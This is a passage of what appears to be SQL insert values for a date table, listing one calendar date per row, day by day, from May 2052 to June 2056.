('2052-05-12'),
('2052-05-13'),
('2052-05-14'),
('2052-05-15'),
('2052-05-16'),
('2052-05-17'),
('2052-05-18'),
('2052-05-19'),
('2052-05-20'),
('2052-05-21'),
('2052-05-22'),
('2052-05-23'),
('2052-05-24'),
('2052-05-25'),
('2052-05-26'),
('2052-05-27'),
('2052-05-28'),
('2052-05-29'),
('2052-05-30'),
('2052-05-31'),
('2052-06-01'),
('2052-06-02'),
('2052-06-03'),
('2052-06-04'),
('2052-06-05'),
('2052-06-06'),
('2052-06-07'),
('2052-06-08'),
('2052-06-09'),
('2052-06-10'),
('2052-06-11'),
('2052-06-12'),
('2052-06-13'),
('2052-06-14'),
('2052-06-15'),
('2052-06-16'),
('2052-06-17'),
('2052-06-18'),
('2052-06-19'),
('2052-06-20'),
('2052-06-21'),
('2052-06-22'),
('2052-06-23'),
('2052-06-24'),
('2052-06-25'),
('2052-06-26'),
('2052-06-27'),
('2052-06-28'),
('2052-06-29'),
('2052-06-30'),
('2052-07-01'),
('2052-07-02'),
('2052-07-03'),
('2052-07-04'),
('2052-07-05'),
('2052-07-06'),
('2052-07-07'),
('2052-07-08'),
('2052-07-09'),
('2052-07-10'),
('2052-07-11'),
('2052-07-12'),
('2052-07-13'),
('2052-07-14'),
('2052-07-15'),
('2052-07-16'),
('2052-07-17'),
('2052-07-18'),
('2052-07-19'),
('2052-07-20'),
('2052-07-21'),
('2052-07-22'),
('2052-07-23'),
('2052-07-24'),
('2052-07-25'),
('2052-07-26'),
('2052-07-27'),
('2052-07-28'),
('2052-07-29'),
('2052-07-30'),
('2052-07-31'),
('2052-08-01'),
('2052-08-02'),
('2052-08-03'),
('2052-08-04'),
('2052-08-05'),
('2052-08-06'),
('2052-08-07'),
('2052-08-08'),
('2052-08-09'),
('2052-08-10'),
('2052-08-11'),
('2052-08-12'),
('2052-08-13'),
('2052-08-14'),
('2052-08-15'),
('2052-08-16'),
('2052-08-17'),
('2052-08-18'),
('2052-08-19'),
('2052-08-20'),
('2052-08-21'),
('2052-08-22'),
('2052-08-23'),
('2052-08-24'),
('2052-08-25'),
('2052-08-26'),
('2052-08-27'),
('2052-08-28'),
('2052-08-29'),
('2052-08-30'),
('2052-08-31'),
('2052-09-01'),
('2052-09-02'),
('2052-09-03'),
('2052-09-04'),
('2052-09-05'),
('2052-09-06'),
('2052-09-07'),
('2052-09-08'),
('2052-09-09'),
('2052-09-10'),
('2052-09-11'),
('2052-09-12'),
('2052-09-13'),
('2052-09-14'),
('2052-09-15'),
('2052-09-16'),
('2052-09-17'),
('2052-09-18'),
('2052-09-19'),
('2052-09-20'),
('2052-09-21'),
('2052-09-22'),
('2052-09-23'),
('2052-09-24'),
('2052-09-25'),
('2052-09-26'),
('2052-09-27'),
('2052-09-28'),
('2052-09-29'),
('2052-09-30'),
('2052-10-01'),
('2052-10-02'),
('2052-10-03'),
('2052-10-04'),
('2052-10-05'),
('2052-10-06'),
('2052-10-07'),
('2052-10-08'),
('2052-10-09'),
('2052-10-10'),
('2052-10-11'),
('2052-10-12'),
('2052-10-13'),
('2052-10-14'),
('2052-10-15'),
('2052-10-16'),
('2052-10-17'),
('2052-10-18'),
('2052-10-19'),
('2052-10-20'),
('2052-10-21'),
('2052-10-22'),
('2052-10-23'),
('2052-10-24'),
('2052-10-25'),
('2052-10-26'),
('2052-10-27'),
('2052-10-28'),
('2052-10-29'),
('2052-10-30'),
('2052-10-31'),
('2052-11-01'),
('2052-11-02'),
('2052-11-03'),
('2052-11-04'),
('2052-11-05'),
('2052-11-06'),
('2052-11-07'),
('2052-11-08'),
('2052-11-09'),
('2052-11-10'),
('2052-11-11'),
('2052-11-12'),
('2052-11-13'),
('2052-11-14'),
('2052-11-15'),
('2052-11-16'),
('2052-11-17'),
('2052-11-18'),
('2052-11-19'),
('2052-11-20'),
('2052-11-21'),
('2052-11-22'),
('2052-11-23'),
('2052-11-24'),
('2052-11-25'),
('2052-11-26'),
('2052-11-27'),
('2052-11-28'),
('2052-11-29'),
('2052-11-30'),
('2052-12-01'),
('2052-12-02'),
('2052-12-03'),
('2052-12-04'),
('2052-12-05'),
('2052-12-06'),
('2052-12-07'),
('2052-12-08'),
('2052-12-09'),
('2052-12-10'),
('2052-12-11'),
('2052-12-12'),
('2052-12-13'),
('2052-12-14'),
('2052-12-15'),
('2052-12-16'),
('2052-12-17'),
('2052-12-18'),
('2052-12-19'),
('2052-12-20'),
('2052-12-21'),
('2052-12-22'),
('2052-12-23'),
('2052-12-24'),
('2052-12-25'),
('2052-12-26'),
('2052-12-27'),
('2052-12-28'),
('2052-12-29'),
('2052-12-30'),
('2052-12-31'),
('2053-01-01'),
('2053-01-02'),
('2053-01-03'),
('2053-01-04'),
('2053-01-05'),
('2053-01-06'),
('2053-01-07'),
('2053-01-08'),
('2053-01-09'),
('2053-01-10'),
('2053-01-11'),
('2053-01-12'),
('2053-01-13'),
('2053-01-14'),
('2053-01-15'),
('2053-01-16'),
('2053-01-17'),
('2053-01-18'),
('2053-01-19'),
('2053-01-20'),
('2053-01-21'),
('2053-01-22'),
('2053-01-23'),
('2053-01-24'),
('2053-01-25'),
('2053-01-26'),
('2053-01-27'),
('2053-01-28'),
('2053-01-29'),
('2053-01-30'),
('2053-01-31'),
('2053-02-01'),
('2053-02-02'),
('2053-02-03'),
('2053-02-04'),
('2053-02-05'),
('2053-02-06'),
('2053-02-07'),
('2053-02-08'),
('2053-02-09'),
('2053-02-10'),
('2053-02-11'),
('2053-02-12'),
('2053-02-13'),
('2053-02-14'),
('2053-02-15'),
('2053-02-16'),
('2053-02-17'),
('2053-02-18'),
('2053-02-19'),
('2053-02-20'),
('2053-02-21'),
('2053-02-22'),
('2053-02-23'),
('2053-02-24'),
('2053-02-25'),
('2053-02-26'),
('2053-02-27'),
('2053-02-28'),
('2053-03-01'),
('2053-03-02'),
('2053-03-03'),
('2053-03-04'),
('2053-03-05'),
('2053-03-06'),
('2053-03-07'),
('2053-03-08'),
('2053-03-09'),
('2053-03-10'),
('2053-03-11'),
('2053-03-12'),
('2053-03-13'),
('2053-03-14'),
('2053-03-15'),
('2053-03-16'),
('2053-03-17'),
('2053-03-18'),
('2053-03-19'),
('2053-03-20'),
('2053-03-21'),
('2053-03-22'),
('2053-03-23'),
('2053-03-24'),
('2053-03-25'),
('2053-03-26'),
('2053-03-27'),
('2053-03-28'),
('2053-03-29'),
('2053-03-30'),
('2053-03-31'),
('2053-04-01'),
('2053-04-02'),
('2053-04-03'),
('2053-04-04'),
('2053-04-05'),
('2053-04-06'),
('2053-04-07'),
('2053-04-08'),
('2053-04-09'),
('2053-04-10'),
('2053-04-11'),
('2053-04-12'),
('2053-04-13'),
('2053-04-14'),
('2053-04-15'),
('2053-04-16'),
('2053-04-17'),
('2053-04-18'),
('2053-04-19'),
('2053-04-20'),
('2053-04-21'),
('2053-04-22'),
('2053-04-23'),
('2053-04-24'),
('2053-04-25'),
('2053-04-26'),
('2053-04-27'),
('2053-04-28'),
('2053-04-29'),
('2053-04-30'),
('2053-05-01'),
('2053-05-02'),
('2053-05-03'),
('2053-05-04'),
('2053-05-05'),
('2053-05-06'),
('2053-05-07'),
('2053-05-08'),
('2053-05-09'),
('2053-05-10'),
('2053-05-11'),
('2053-05-12'),
('2053-05-13'),
('2053-05-14'),
('2053-05-15'),
('2053-05-16'),
('2053-05-17'),
('2053-05-18'),
('2053-05-19'),
('2053-05-20'),
('2053-05-21'),
('2053-05-22'),
('2053-05-23'),
('2053-05-24'),
('2053-05-25'),
('2053-05-26'),
('2053-05-27'),
('2053-05-28'),
('2053-05-29'),
('2053-05-30'),
('2053-05-31'),
('2053-06-01'),
('2053-06-02'),
('2053-06-03'),
('2053-06-04'),
('2053-06-05'),
('2053-06-06'),
('2053-06-07'),
('2053-06-08'),
('2053-06-09'),
('2053-06-10'),
('2053-06-11'),
('2053-06-12'),
('2053-06-13'),
('2053-06-14'),
('2053-06-15'),
('2053-06-16'),
('2053-06-17'),
('2053-06-18'),
('2053-06-19'),
('2053-06-20'),
('2053-06-21'),
('2053-06-22'),
('2053-06-23'),
('2053-06-24'),
('2053-06-25'),
('2053-06-26'),
('2053-06-27'),
('2053-06-28'),
('2053-06-29'),
('2053-06-30'),
('2053-07-01'),
('2053-07-02'),
('2053-07-03'),
('2053-07-04'),
('2053-07-05'),
('2053-07-06'),
('2053-07-07'),
('2053-07-08'),
('2053-07-09'),
('2053-07-10'),
('2053-07-11'),
('2053-07-12'),
('2053-07-13'),
('2053-07-14'),
('2053-07-15'),
('2053-07-16'),
('2053-07-17'),
('2053-07-18'),
('2053-07-19'),
('2053-07-20'),
('2053-07-21'),
('2053-07-22'),
('2053-07-23'),
('2053-07-24'),
('2053-07-25'),
('2053-07-26'),
('2053-07-27'),
('2053-07-28'),
('2053-07-29'),
('2053-07-30'),
('2053-07-31'),
('2053-08-01'),
('2053-08-02'),
('2053-08-03'),
('2053-08-04'),
('2053-08-05'),
('2053-08-06'),
('2053-08-07'),
('2053-08-08'),
('2053-08-09'),
('2053-08-10'),
('2053-08-11'),
('2053-08-12'),
('2053-08-13'),
('2053-08-14'),
('2053-08-15'),
('2053-08-16'),
('2053-08-17'),
('2053-08-18'),
('2053-08-19'),
('2053-08-20'),
('2053-08-21'),
('2053-08-22'),
('2053-08-23'),
('2053-08-24'),
('2053-08-25'),
('2053-08-26'),
('2053-08-27'),
('2053-08-28'),
('2053-08-29'),
('2053-08-30'),
('2053-08-31'),
('2053-09-01'),
('2053-09-02'),
('2053-09-03'),
('2053-09-04'),
('2053-09-05'),
('2053-09-06'),
('2053-09-07'),
('2053-09-08'),
('2053-09-09'),
('2053-09-10'),
('2053-09-11'),
('2053-09-12'),
('2053-09-13'),
('2053-09-14'),
('2053-09-15'),
('2053-09-16'),
('2053-09-17'),
('2053-09-18'),
('2053-09-19'),
('2053-09-20'),
('2053-09-21'),
('2053-09-22'),
('2053-09-23'),
('2053-09-24'),
('2053-09-25'),
('2053-09-26'),
('2053-09-27'),
('2053-09-28'),
('2053-09-29'),
('2053-09-30'),
('2053-10-01'),
('2053-10-02'),
('2053-10-03'),
('2053-10-04'),
('2053-10-05'),
('2053-10-06'),
('2053-10-07'),
('2053-10-08'),
('2053-10-09'),
('2053-10-10'),
('2053-10-11'),
('2053-10-12'),
('2053-10-13'),
('2053-10-14'),
('2053-10-15'),
('2053-10-16'),
('2053-10-17'),
('2053-10-18'),
('2053-10-19'),
('2053-10-20'),
('2053-10-21'),
('2053-10-22'),
('2053-10-23'),
('2053-10-24'),
('2053-10-25'),
('2053-10-26'),
('2053-10-27'),
('2053-10-28'),
('2053-10-29'),
('2053-10-30'),
('2053-10-31'),
('2053-11-01'),
('2053-11-02'),
('2053-11-03'),
('2053-11-04'),
('2053-11-05'),
('2053-11-06'),
('2053-11-07'),
('2053-11-08'),
('2053-11-09'),
('2053-11-10'),
('2053-11-11'),
('2053-11-12'),
('2053-11-13'),
('2053-11-14'),
('2053-11-15'),
('2053-11-16'),
('2053-11-17'),
('2053-11-18'),
('2053-11-19'),
('2053-11-20'),
('2053-11-21'),
('2053-11-22'),
('2053-11-23'),
('2053-11-24'),
('2053-11-25'),
('2053-11-26'),
('2053-11-27'),
('2053-11-28'),
('2053-11-29'),
('2053-11-30'),
('2053-12-01'),
('2053-12-02'),
('2053-12-03'),
('2053-12-04'),
('2053-12-05'),
('2053-12-06'),
('2053-12-07'),
('2053-12-08'),
('2053-12-09'),
('2053-12-10'),
('2053-12-11'),
('2053-12-12'),
('2053-12-13'),
('2053-12-14'),
('2053-12-15'),
('2053-12-16'),
('2053-12-17'),
('2053-12-18'),
('2053-12-19'),
('2053-12-20'),
('2053-12-21'),
('2053-12-22'),
('2053-12-23'),
('2053-12-24'),
('2053-12-25'),
('2053-12-26'),
('2053-12-27'),
('2053-12-28'),
('2053-12-29'),
('2053-12-30'),
('2053-12-31'),
('2054-01-01'),
('2054-01-02'),
('2054-01-03'),
('2054-01-04'),
('2054-01-05'),
('2054-01-06'),
('2054-01-07'),
('2054-01-08'),
('2054-01-09'),
('2054-01-10'),
('2054-01-11'),
('2054-01-12'),
('2054-01-13'),
('2054-01-14'),
('2054-01-15'),
('2054-01-16'),
('2054-01-17'),
('2054-01-18'),
('2054-01-19'),
('2054-01-20'),
('2054-01-21'),
('2054-01-22'),
('2054-01-23'),
('2054-01-24'),
('2054-01-25'),
('2054-01-26'),
('2054-01-27'),
('2054-01-28'),
('2054-01-29'),
('2054-01-30'),
('2054-01-31'),
('2054-02-01'),
('2054-02-02'),
('2054-02-03'),
('2054-02-04'),
('2054-02-05'),
('2054-02-06'),
('2054-02-07'),
('2054-02-08'),
('2054-02-09'),
('2054-02-10'),
('2054-02-11'),
('2054-02-12'),
('2054-02-13'),
('2054-02-14'),
('2054-02-15'),
('2054-02-16'),
('2054-02-17'),
('2054-02-18'),
('2054-02-19'),
('2054-02-20'),
('2054-02-21'),
('2054-02-22'),
('2054-02-23'),
('2054-02-24'),
('2054-02-25'),
('2054-02-26'),
('2054-02-27'),
('2054-02-28'),
('2054-03-01'),
('2054-03-02'),
('2054-03-03'),
('2054-03-04'),
('2054-03-05'),
('2054-03-06'),
('2054-03-07'),
('2054-03-08'),
('2054-03-09'),
('2054-03-10'),
('2054-03-11'),
('2054-03-12'),
('2054-03-13'),
('2054-03-14'),
('2054-03-15'),
('2054-03-16'),
('2054-03-17'),
('2054-03-18'),
('2054-03-19'),
('2054-03-20'),
('2054-03-21'),
('2054-03-22'),
('2054-03-23'),
('2054-03-24'),
('2054-03-25'),
('2054-03-26'),
('2054-03-27'),
('2054-03-28'),
('2054-03-29'),
('2054-03-30'),
('2054-03-31'),
('2054-04-01'),
('2054-04-02'),
('2054-04-03'),
('2054-04-04'),
('2054-04-05'),
('2054-04-06'),
('2054-04-07'),
('2054-04-08'),
('2054-04-09'),
('2054-04-10'),
('2054-04-11'),
('2054-04-12'),
('2054-04-13'),
('2054-04-14'),
('2054-04-15'),
('2054-04-16'),
('2054-04-17'),
('2054-04-18'),
('2054-04-19'),
('2054-04-20'),
('2054-04-21'),
('2054-04-22'),
('2054-04-23'),
('2054-04-24'),
('2054-04-25'),
('2054-04-26'),
('2054-04-27'),
('2054-04-28'),
('2054-04-29'),
('2054-04-30'),
('2054-05-01'),
('2054-05-02'),
('2054-05-03'),
('2054-05-04'),
('2054-05-05'),
('2054-05-06'),
('2054-05-07'),
('2054-05-08'),
('2054-05-09'),
('2054-05-10'),
('2054-05-11'),
('2054-05-12'),
('2054-05-13'),
('2054-05-14'),
('2054-05-15'),
('2054-05-16'),
('2054-05-17'),
('2054-05-18'),
('2054-05-19'),
('2054-05-20'),
('2054-05-21'),
('2054-05-22'),
('2054-05-23'),
('2054-05-24'),
('2054-05-25'),
('2054-05-26'),
('2054-05-27'),
('2054-05-28'),
('2054-05-29'),
('2054-05-30'),
('2054-05-31'),
('2054-06-01'),
('2054-06-02'),
('2054-06-03'),
('2054-06-04'),
('2054-06-05'),
('2054-06-06'),
('2054-06-07'),
('2054-06-08'),
('2054-06-09'),
('2054-06-10'),
('2054-06-11'),
('2054-06-12'),
('2054-06-13'),
('2054-06-14'),
('2054-06-15'),
('2054-06-16'),
('2054-06-17'),
('2054-06-18'),
('2054-06-19'),
('2054-06-20'),
('2054-06-21'),
('2054-06-22'),
('2054-06-23'),
('2054-06-24'),
('2054-06-25'),
('2054-06-26'),
('2054-06-27'),
('2054-06-28'),
('2054-06-29'),
('2054-06-30'),
('2054-07-01'),
('2054-07-02'),
('2054-07-03'),
('2054-07-04'),
('2054-07-05'),
('2054-07-06'),
('2054-07-07'),
('2054-07-08'),
('2054-07-09'),
('2054-07-10'),
('2054-07-11'),
('2054-07-12'),
('2054-07-13'),
('2054-07-14'),
('2054-07-15'),
('2054-07-16'),
('2054-07-17'),
('2054-07-18'),
('2054-07-19'),
('2054-07-20'),
('2054-07-21'),
('2054-07-22'),
('2054-07-23'),
('2054-07-24'),
('2054-07-25'),
('2054-07-26'),
('2054-07-27'),
('2054-07-28'),
('2054-07-29'),
('2054-07-30'),
('2054-07-31'),
('2054-08-01'),
('2054-08-02'),
('2054-08-03'),
('2054-08-04'),
('2054-08-05'),
('2054-08-06'),
('2054-08-07'),
('2054-08-08'),
('2054-08-09'),
('2054-08-10'),
('2054-08-11'),
('2054-08-12'),
('2054-08-13'),
('2054-08-14'),
('2054-08-15'),
('2054-08-16'),
('2054-08-17'),
('2054-08-18'),
('2054-08-19'),
('2054-08-20'),
('2054-08-21'),
('2054-08-22'),
('2054-08-23'),
('2054-08-24'),
('2054-08-25'),
('2054-08-26'),
('2054-08-27'),
('2054-08-28'),
('2054-08-29'),
('2054-08-30'),
('2054-08-31'),
('2054-09-01'),
('2054-09-02'),
('2054-09-03'),
('2054-09-04'),
('2054-09-05'),
('2054-09-06'),
('2054-09-07'),
('2054-09-08'),
('2054-09-09'),
('2054-09-10'),
('2054-09-11'),
('2054-09-12'),
('2054-09-13'),
('2054-09-14'),
('2054-09-15'),
('2054-09-16'),
('2054-09-17'),
('2054-09-18'),
('2054-09-19'),
('2054-09-20'),
('2054-09-21'),
('2054-09-22'),
('2054-09-23'),
('2054-09-24'),
('2054-09-25'),
('2054-09-26'),
('2054-09-27'),
('2054-09-28'),
('2054-09-29'),
('2054-09-30'),
('2054-10-01'),
('2054-10-02'),
('2054-10-03'),
('2054-10-04'),
('2054-10-05'),
('2054-10-06'),
('2054-10-07'),
('2054-10-08'),
('2054-10-09'),
('2054-10-10'),
('2054-10-11'),
('2054-10-12'),
('2054-10-13'),
('2054-10-14'),
('2054-10-15'),
('2054-10-16'),
('2054-10-17'),
('2054-10-18'),
('2054-10-19'),
('2054-10-20'),
('2054-10-21'),
('2054-10-22'),
('2054-10-23'),
('2054-10-24'),
('2054-10-25'),
('2054-10-26'),
('2054-10-27'),
('2054-10-28'),
('2054-10-29'),
('2054-10-30'),
('2054-10-31'),
('2054-11-01'),
('2054-11-02'),
('2054-11-03'),
('2054-11-04'),
('2054-11-05'),
('2054-11-06'),
('2054-11-07'),
('2054-11-08'),
('2054-11-09'),
('2054-11-10'),
('2054-11-11'),
('2054-11-12'),
('2054-11-13'),
('2054-11-14'),
('2054-11-15'),
('2054-11-16'),
('2054-11-17'),
('2054-11-18'),
('2054-11-19'),
('2054-11-20'),
('2054-11-21'),
('2054-11-22'),
('2054-11-23'),
('2054-11-24'),
('2054-11-25'),
('2054-11-26'),
('2054-11-27'),
('2054-11-28'),
('2054-11-29'),
('2054-11-30'),
('2054-12-01'),
('2054-12-02'),
('2054-12-03'),
('2054-12-04'),
('2054-12-05'),
('2054-12-06'),
('2054-12-07'),
('2054-12-08'),
('2054-12-09'),
('2054-12-10'),
('2054-12-11'),
('2054-12-12'),
('2054-12-13'),
('2054-12-14'),
('2054-12-15'),
('2054-12-16'),
('2054-12-17'),
('2054-12-18'),
('2054-12-19'),
('2054-12-20'),
('2054-12-21'),
('2054-12-22'),
('2054-12-23'),
('2054-12-24'),
('2054-12-25'),
('2054-12-26'),
('2054-12-27'),
('2054-12-28'),
('2054-12-29'),
('2054-12-30'),
('2054-12-31'),
('2055-01-01'),
('2055-01-02'),
('2055-01-03'),
('2055-01-04'),
('2055-01-05'),
('2055-01-06'),
('2055-01-07'),
('2055-01-08'),
('2055-01-09'),
('2055-01-10'),
('2055-01-11'),
('2055-01-12'),
('2055-01-13'),
('2055-01-14'),
('2055-01-15'),
('2055-01-16'),
('2055-01-17'),
('2055-01-18'),
('2055-01-19'),
('2055-01-20'),
('2055-01-21'),
('2055-01-22'),
('2055-01-23'),
('2055-01-24'),
('2055-01-25'),
('2055-01-26'),
('2055-01-27'),
('2055-01-28'),
('2055-01-29'),
('2055-01-30'),
('2055-01-31'),
('2055-02-01'),
('2055-02-02'),
('2055-02-03'),
('2055-02-04'),
('2055-02-05'),
('2055-02-06'),
('2055-02-07'),
('2055-02-08'),
('2055-02-09'),
('2055-02-10'),
('2055-02-11'),
('2055-02-12'),
('2055-02-13'),
('2055-02-14'),
('2055-02-15'),
('2055-02-16'),
('2055-02-17'),
('2055-02-18'),
('2055-02-19'),
('2055-02-20'),
('2055-02-21'),
('2055-02-22'),
('2055-02-23'),
('2055-02-24'),
('2055-02-25'),
('2055-02-26'),
('2055-02-27'),
('2055-02-28'),
('2055-03-01'),
('2055-03-02'),
('2055-03-03'),
('2055-03-04'),
('2055-03-05'),
('2055-03-06'),
('2055-03-07'),
('2055-03-08'),
('2055-03-09'),
('2055-03-10'),
('2055-03-11'),
('2055-03-12'),
('2055-03-13'),
('2055-03-14'),
('2055-03-15'),
('2055-03-16'),
('2055-03-17'),
('2055-03-18'),
('2055-03-19'),
('2055-03-20'),
('2055-03-21'),
('2055-03-22'),
('2055-03-23'),
('2055-03-24'),
('2055-03-25'),
('2055-03-26'),
('2055-03-27'),
('2055-03-28'),
('2055-03-29'),
('2055-03-30'),
('2055-03-31'),
('2055-04-01'),
('2055-04-02'),
('2055-04-03'),
('2055-04-04'),
('2055-04-05'),
('2055-04-06'),
('2055-04-07'),
('2055-04-08'),
('2055-04-09'),
('2055-04-10'),
('2055-04-11'),
('2055-04-12'),
('2055-04-13'),
('2055-04-14'),
('2055-04-15'),
('2055-04-16'),
('2055-04-17'),
('2055-04-18'),
('2055-04-19'),
('2055-04-20'),
('2055-04-21'),
('2055-04-22'),
('2055-04-23'),
('2055-04-24'),
('2055-04-25'),
('2055-04-26'),
('2055-04-27'),
('2055-04-28'),
('2055-04-29'),
('2055-04-30'),
('2055-05-01'),
('2055-05-02'),
('2055-05-03'),
('2055-05-04'),
('2055-05-05'),
('2055-05-06'),
('2055-05-07'),
('2055-05-08'),
('2055-05-09'),
('2055-05-10'),
('2055-05-11'),
('2055-05-12'),
('2055-05-13'),
('2055-05-14'),
('2055-05-15'),
('2055-05-16'),
('2055-05-17'),
('2055-05-18'),
('2055-05-19'),
('2055-05-20'),
('2055-05-21'),
('2055-05-22'),
('2055-05-23'),
('2055-05-24'),
('2055-05-25'),
('2055-05-26'),
('2055-05-27'),
('2055-05-28'),
('2055-05-29'),
('2055-05-30'),
('2055-05-31'),
('2055-06-01'),
('2055-06-02'),
('2055-06-03'),
('2055-06-04'),
('2055-06-05'),
('2055-06-06'),
('2055-06-07'),
('2055-06-08'),
('2055-06-09'),
('2055-06-10'),
('2055-06-11'),
('2055-06-12'),
('2055-06-13'),
('2055-06-14'),
('2055-06-15'),
('2055-06-16'),
('2055-06-17'),
('2055-06-18'),
('2055-06-19'),
('2055-06-20'),
('2055-06-21'),
('2055-06-22'),
('2055-06-23'),
('2055-06-24'),
('2055-06-25'),
('2055-06-26'),
('2055-06-27'),
('2055-06-28'),
('2055-06-29'),
('2055-06-30'),
('2055-07-01'),
('2055-07-02'),
('2055-07-03'),
('2055-07-04'),
('2055-07-05'),
('2055-07-06'),
('2055-07-07'),
('2055-07-08'),
('2055-07-09'),
('2055-07-10'),
('2055-07-11'),
('2055-07-12'),
('2055-07-13'),
('2055-07-14'),
('2055-07-15'),
('2055-07-16'),
('2055-07-17'),
('2055-07-18'),
('2055-07-19'),
('2055-07-20'),
('2055-07-21'),
('2055-07-22'),
('2055-07-23'),
('2055-07-24'),
('2055-07-25'),
('2055-07-26'),
('2055-07-27'),
('2055-07-28'),
('2055-07-29'),
('2055-07-30'),
('2055-07-31'),
('2055-08-01'),
('2055-08-02'),
('2055-08-03'),
('2055-08-04'),
('2055-08-05'),
('2055-08-06'),
('2055-08-07'),
('2055-08-08'),
('2055-08-09'),
('2055-08-10'),
('2055-08-11'),
('2055-08-12'),
('2055-08-13'),
('2055-08-14'),
('2055-08-15'),
('2055-08-16'),
('2055-08-17'),
('2055-08-18'),
('2055-08-19'),
('2055-08-20'),
('2055-08-21'),
('2055-08-22'),
('2055-08-23'),
('2055-08-24'),
('2055-08-25'),
('2055-08-26'),
('2055-08-27'),
('2055-08-28'),
('2055-08-29'),
('2055-08-30'),
('2055-08-31'),
('2055-09-01'),
('2055-09-02'),
('2055-09-03'),
('2055-09-04'),
('2055-09-05'),
('2055-09-06'),
('2055-09-07'),
('2055-09-08'),
('2055-09-09'),
('2055-09-10'),
('2055-09-11'),
('2055-09-12'),
('2055-09-13'),
('2055-09-14'),
('2055-09-15'),
('2055-09-16'),
('2055-09-17'),
('2055-09-18'),
('2055-09-19'),
('2055-09-20'),
('2055-09-21'),
('2055-09-22'),
('2055-09-23'),
('2055-09-24'),
('2055-09-25'),
('2055-09-26'),
('2055-09-27'),
('2055-09-28'),
('2055-09-29'),
('2055-09-30'),
('2055-10-01'),
('2055-10-02'),
('2055-10-03'),
('2055-10-04'),
('2055-10-05'),
('2055-10-06'),
('2055-10-07'),
('2055-10-08'),
('2055-10-09'),
('2055-10-10'),
('2055-10-11'),
('2055-10-12'),
('2055-10-13'),
('2055-10-14'),
('2055-10-15'),
('2055-10-16'),
('2055-10-17'),
('2055-10-18'),
('2055-10-19'),
('2055-10-20'),
('2055-10-21'),
('2055-10-22'),
('2055-10-23'),
('2055-10-24'),
('2055-10-25'),
('2055-10-26'),
('2055-10-27'),
('2055-10-28'),
('2055-10-29'),
('2055-10-30'),
('2055-10-31'),
('2055-11-01'),
('2055-11-02'),
('2055-11-03'),
('2055-11-04'),
('2055-11-05'),
('2055-11-06'),
('2055-11-07'),
('2055-11-08'),
('2055-11-09'),
('2055-11-10'),
('2055-11-11'),
('2055-11-12'),
('2055-11-13'),
('2055-11-14'),
('2055-11-15'),
('2055-11-16'),
('2055-11-17'),
('2055-11-18'),
('2055-11-19'),
('2055-11-20'),
('2055-11-21'),
('2055-11-22'),
('2055-11-23'),
('2055-11-24'),
('2055-11-25'),
('2055-11-26'),
('2055-11-27'),
('2055-11-28'),
('2055-11-29'),
('2055-11-30'),
('2055-12-01'),
('2055-12-02'),
('2055-12-03'),
('2055-12-04'),
('2055-12-05'),
('2055-12-06'),
('2055-12-07'),
('2055-12-08'),
('2055-12-09'),
('2055-12-10'),
('2055-12-11'),
('2055-12-12'),
('2055-12-13'),
('2055-12-14'),
('2055-12-15'),
('2055-12-16'),
('2055-12-17'),
('2055-12-18'),
('2055-12-19'),
('2055-12-20'),
('2055-12-21'),
('2055-12-22'),
('2055-12-23'),
('2055-12-24'),
('2055-12-25'),
('2055-12-26'),
('2055-12-27'),
('2055-12-28'),
('2055-12-29'),
('2055-12-30'),
('2055-12-31'),
('2056-01-01'),
('2056-01-02'),
('2056-01-03'),
('2056-01-04'),
('2056-01-05'),
('2056-01-06'),
('2056-01-07'),
('2056-01-08'),
('2056-01-09'),
('2056-01-10'),
('2056-01-11'),
('2056-01-12'),
('2056-01-13'),
('2056-01-14'),
('2056-01-15'),
('2056-01-16'),
('2056-01-17'),
('2056-01-18'),
('2056-01-19'),
('2056-01-20'),
('2056-01-21'),
('2056-01-22'),
('2056-01-23'),
('2056-01-24'),
('2056-01-25'),
('2056-01-26'),
('2056-01-27'),
('2056-01-28'),
('2056-01-29'),
('2056-01-30'),
('2056-01-31'),
('2056-02-01'),
('2056-02-02'),
('2056-02-03'),
('2056-02-04'),
('2056-02-05'),
('2056-02-06'),
('2056-02-07'),
('2056-02-08'),
('2056-02-09'),
('2056-02-10'),
('2056-02-11'),
('2056-02-12'),
('2056-02-13'),
('2056-02-14'),
('2056-02-15'),
('2056-02-16'),
('2056-02-17'),
('2056-02-18'),
('2056-02-19'),
('2056-02-20'),
('2056-02-21'),
('2056-02-22'),
('2056-02-23'),
('2056-02-24'),
('2056-02-25'),
('2056-02-26'),
('2056-02-27'),
('2056-02-28'),
('2056-02-29'),
('2056-03-01'),
('2056-03-02'),
('2056-03-03'),
('2056-03-04'),
('2056-03-05'),
('2056-03-06'),
('2056-03-07'),
('2056-03-08'),
('2056-03-09'),
('2056-03-10'),
('2056-03-11'),
('2056-03-12'),
('2056-03-13'),
('2056-03-14'),
('2056-03-15'),
('2056-03-16'),
('2056-03-17'),
('2056-03-18'),
('2056-03-19'),
('2056-03-20'),
('2056-03-21'),
('2056-03-22'),
('2056-03-23'),
('2056-03-24'),
('2056-03-25'),
('2056-03-26'),
('2056-03-27'),
('2056-03-28'),
('2056-03-29'),
('2056-03-30'),
('2056-03-31'),
('2056-04-01'),
('2056-04-02'),
('2056-04-03'),
('2056-04-04'),
('2056-04-05'),
('2056-04-06'),
('2056-04-07'),
('2056-04-08'),
('2056-04-09'),
('2056-04-10'),
('2056-04-11'),
('2056-04-12'),
('2056-04-13'),
('2056-04-14'),
('2056-04-15'),
('2056-04-16'),
('2056-04-17'),
('2056-04-18'),
('2056-04-19'),
('2056-04-20'),
('2056-04-21'),
('2056-04-22'),
('2056-04-23'),
('2056-04-24'),
('2056-04-25'),
('2056-04-26'),
('2056-04-27'),
('2056-04-28'),
('2056-04-29'),
('2056-04-30'),
('2056-05-01'),
('2056-05-02'),
('2056-05-03'),
('2056-05-04'),
('2056-05-05'),
('2056-05-06'),
('2056-05-07'),
('2056-05-08'),
('2056-05-09'),
('2056-05-10'),
('2056-05-11'),
('2056-05-12'),
('2056-05-13'),
('2056-05-14'),
('2056-05-15'),
('2056-05-16'),
('2056-05-17'),
('2056-05-18'),
('2056-05-19'),
('2056-05-20'),
('2056-05-21'),
('2056-05-22'),
('2056-05-23'),
('2056-05-24'),
('2056-05-25'),
('2056-05-26'),
('2056-05-27'),
('2056-05-28'),
('2056-05-29'),
('2056-05-30'),
('2056-05-31'),
('2056-06-01'),
('2056-06-02'),
('2056-06-03'),
('2056-06-04'),
('2056-06-05'),
('2056-06-06'),
('2056-06-07'),
('2056-06-08'),
('2056-06-09'),
('2056-06-10'),
('2056-06-11'),
('2056-06-12'),
('2056-06-13'),
('2056-06-14'),
('2056-06-15'),
('2056-06-16'),
('2056-06-17'),
('2056-06-18'),
('2056-06-19'),
